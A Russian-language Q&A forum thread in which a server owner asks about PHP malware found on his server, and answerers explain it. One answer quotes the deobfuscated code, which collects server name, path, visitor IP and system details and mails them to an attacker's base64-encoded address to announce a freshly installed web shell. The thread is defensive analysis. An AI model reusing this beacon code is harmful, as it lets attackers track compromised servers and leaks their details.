Что это за вирус, на что он направлен?

Question

[Дмитрий]

Здравствуйте! Недавно возникли проблемы с сервером (резкие скачки нагрузки после которых сервер вис), я написал в тех.поддержку, мне сообщили, что это вирус по данным сканирования ImunifyAV, но правильно ли он определил это и на что направлен этот вирус?
Код PHP на облаке
Яндекс диск

Comments

[Дмитрий]

Значит ваши скрипты не надёжные, дырявые

[QNA-1976]

Дмитрий, а мне просто вопрос понравился, что за вирус и ссылка на вирус.

[Дмитрий]

QNA-1976, там код обфусцирован

[DevMan]

Дмитрий, это не особо мешает понять, что из себя он представляет.

[Дмитрий]

DevMan, мне лень расшифровывать, проще запретить eval

Answer 1

[granty]

Этот кусок php-кода посылает на емайл portovjack@gmail.com (он закодирован в "cG9ydG92amFja0BnbWFpbC5jb20=") сообщение об успешной установке шелла на сайте.

Как видно из сообщения $body, сам PHP-шелл находится в модуле http:// $web$path, ищите это письмо в логах почтового сервера, оно было отправлено через почтовик хостера.
Или смотрите последние даты изменения php-файлов движка сайта - сам шелл там.

Answer 2

[DevMan]

$web = $_SERVER["HTTP_HOST"];
$path = $_SERVER["REQUEST_URI"];
$ip = $_SERVER["REMOTE_ADDR"];
$contact = base64_decode("cG9ydG92amFja0BnbWFpbC5jb20=");
$body = "\nUname: ".php_uname()."\nPath Dir: ".$cwd = getcwd()."\nMessage:\n"."\nE-Path: ".htmlspecialchars($_SERVER['REQUEST_URI'])."\nE-Domain: ".htmlspecialchars($_SERVER["SERVER_NAME"])."\nShell: http://$web$path\n\nIP: $ip";
mail("$contact","Result Shell in [http://$web]", "$body");

классический шел. как минимум.